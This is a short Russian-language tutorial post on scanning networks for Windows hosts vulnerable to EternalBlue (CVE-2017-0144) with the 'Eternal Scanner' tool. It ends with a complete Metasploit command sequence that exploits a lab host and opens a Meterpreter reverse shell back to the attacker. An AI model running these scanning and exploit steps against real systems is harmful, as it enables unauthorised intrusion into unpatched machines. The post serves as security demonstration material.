Eternal Scanner - Интернет сканер для эксплойтов CVE-2017-0144

Eternal Scanner - Интернет сканер для эксплойтов CVE-2017-0144

@webware

t.me/webware

Всем привет! В этой статье я хочу продемонстрировать работу сканера, который способен отыскать в сети уязвимые для EternalBlue ( CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, хосты.

Итак, собственно – Eternal Scanner.

CVE-2017-0144 Описание:

Сервер SMBv1 в Microsoft Windows Vista SP2; Windows Server 2008 SP2 и R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold и R2; Windows RT 8.1; И Windows 10 Gold, 1511 и 1607; И Windows Server 2016 Позволяет атакующим удаленно выполнять произвольный код с помощью видоизмененных пакетов как в “Windows SMB Remote Code Execution Vulnerability.”. Эта уязвимость отличается от описанной в CVE-2017-0143, CVE-2017-0145, CVE-2017-0146 , И CVE-2017-0148.

Установка:

> git clone https://github.com/peterpt/eternal_scanner

> cd eternal_scanner

> ls –l

Запуск:

> ./escan

Далее, вводим интересующий нас адрес или диапазон, по маске.

Ждем окончания сканирования:

По итогу проверки обнаружилось три хоста уязвимые к данной атаке:

Результаты проверки сканер услужливо сложил в текстовый файлик:

На этом, пожалуй, все, пойду закрывать дырки…

Хотя, сначала, чуть попробую, не соврал ли сканер.

> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.158

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.180

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit

Пока, все идет ровно. И буквально через 30 сек:

Теперь можно идти, спасибо за внимание.
Источник codeby.net


Report Page